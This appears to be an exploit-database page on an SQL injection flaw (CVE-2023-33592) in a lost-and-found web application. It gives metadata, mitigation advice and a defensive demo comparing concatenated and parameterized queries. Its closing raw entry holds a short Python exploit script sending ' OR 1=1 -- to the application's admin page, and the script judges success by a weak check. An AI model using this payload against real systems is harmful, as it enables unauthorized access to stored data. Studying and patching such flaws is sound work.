vendor:
Lost and Found Information System
by:
Amirhossein Bahramizadeh
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Lost and Found Information System
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CVE: CVE-2023-33592
CPE: a:lost_and_found_information_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2023

Lost and Found Information System v1.0 – SQL Injection

This exploit allows an attacker to perform SQL injection on the Lost and Found Information System v1.0. By injecting a malicious SQL query, the attacker can manipulate the database and potentially access unauthorized information.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.
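The following is an added example written for this page; it is not part of the Exploit-DB entry or of the Lost and Found Information System code base. It shows the two defenses the mitigation note names side by side: a lookup built by string concatenation (the pattern that the `' OR 1=1 -- ` payload on this page abuses) next to the same lookup as a parameterized query, plus an allow-list check for the `page` request parameter. The table name, columns, and rows are constructed for the demo using an in-memory SQLite database and do not reflect the application's real schema.

```python
import sqlite3

# Constructed sample data standing in for a contact-information table.
# Schema and rows are assumptions for this demo, not the product's real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE contact_info (id INTEGER PRIMARY KEY, email TEXT, phone TEXT)"
    )
    conn.executemany(
        "INSERT INTO contact_info (email, phone) VALUES (?, ?)",
        [("admin@example.test", "000-0001"), ("desk@example.test", "000-0002")],
    )
    return conn


def lookup_vulnerable(conn, email):
    # Vulnerable pattern: user input is spliced into the SQL text, so a value
    # such as  ' OR 1=1 --  changes the WHERE clause and returns every row.
    sql = "SELECT email, phone FROM contact_info WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, email):
    # Parameterized query: the driver binds the value separately from the SQL
    # text, so quotes and comment markers in the input are just data.
    sql = "SELECT email, phone FROM contact_info WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


# Allow-list of page identifiers the admin panel may dispatch to.
# The entries are assumptions for the demo; a real deployment would list its
# own pages. Validating the value before any query or file lookup removes the
# need to "sanitize" free-form input at all.
ALLOWED_PAGES = {"system_info/contact_information", "home"}


def resolve_page(page):
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page parameter")
    return page


if __name__ == "__main__":
    db = make_db()
    injected = "' OR 1=1 -- "
    print("vulnerable lookup rows:", len(lookup_vulnerable(db, injected)))  # 2
    print("parameterized lookup rows:", len(lookup_safe(db, injected)))    # 0
    print("resolved page:", resolve_page("system_info/contact_information"))
```

Running the script shows the concatenated query leaking both rows for the injected value while the parameterized query returns none, which is the behaviour a fix for this issue should reproduce in the application's contact-information page.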

Exploit-DB raw data:

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component (example.com is a placeholder host)
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload appended to the page parameter;
# a timeout keeps the script from hanging on an unresponsive host
try:
    response = requests.get(url + payload, timeout=10)
except requests.RequestException as exc:
    print(f"Request failed: {exc}")
    raise SystemExit(1)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")